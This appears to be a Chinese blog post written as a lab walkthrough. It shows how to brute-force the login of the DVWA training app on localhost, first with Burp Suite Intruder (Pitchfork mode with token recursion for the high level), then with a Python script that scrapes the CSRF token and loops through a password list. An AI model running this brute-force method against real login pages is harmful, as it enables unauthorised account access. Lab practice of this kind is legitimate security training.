使用brupsuite和python进行密码爆破

蛮水的一篇文。。。

使用burpsuite工具进行dvwa暴力破解实验

low

首先设好浏览器代理，然后配置burpsuite监听参数

这样的配置会有一个问题，就是burpsuit无法抓住127.0.0.1的包，删掉不使用代理中的网址即可
随意输入密码，抓包
右键send to intruder，只保留密码内容作为爆破变量

构造payload

intruder->start attack

找到密码

medium

同上

high

• 将模式设为Pitchfork

• options设置
• 将线程改为单线程
  
  选择refech response，选定token部分，确定
  将该设置设为always
  
• 设置payloads
  第一个参数设置与之前一样
  
  第二个参数将类型设为Recursive grep，选定之前匹配的token，并在下方文本框输入第一次得到的token值
  找到密码
  

使用python密码爆破high

from bs4 import BeautifulSoup
import urllib.request
header={        'Host': '127.0.0.1:8088',
		'Cache-Control': 'no-cache, must-revalidate',
	    'If-None-Match': "307-52156c6a290c0",
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
		'Accept': '*/*',
		'Referer': 'http://localhost:8088/DVWA/vulnerabilities/brute/index.php',
		'Accept-Encoding': 'gzip, deflate, br',
		'Accept-Language': 'zh-CN,zh;q=0.9',
		'Cookie': 'security=high; PHPSESSID=tgvioof5dbdpg9mtcckpvp1fek'}
requrl = "http://localhost:8088/DVWA/vulnerabilities/brute"

def get_token(requrl,header):
	req = urllib.request.Request(url=requrl,headers=header)
	
	response = urllib.request.urlopen(req)
	
	print (response.getcode())
	the_page = response.read()
	print (len(the_page))
	soup = BeautifulSoup(the_page,"html.parser")
	# print '###################'
	# print soup.find_all('input')[3].get('value')
	user_token = soup.find_all('input')[3].get('value')
	#user_token = soup.form.input.input.input.input["value"]
	return user_token
user_token = get_token(requrl,header)

i=0
//逐条读取密码进行爆破
for line in open('C:/Users/Administrator/Desktop/password.txt'):
    print(line.strip())
    requrl = "http://127.0.0.1:8088/dvwa/vulnerabilities/brute/"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
    i= i+1
    print (i,'admin',line.strip())
    user_token = get_token(requrl,header)
    if (i == 10):
        break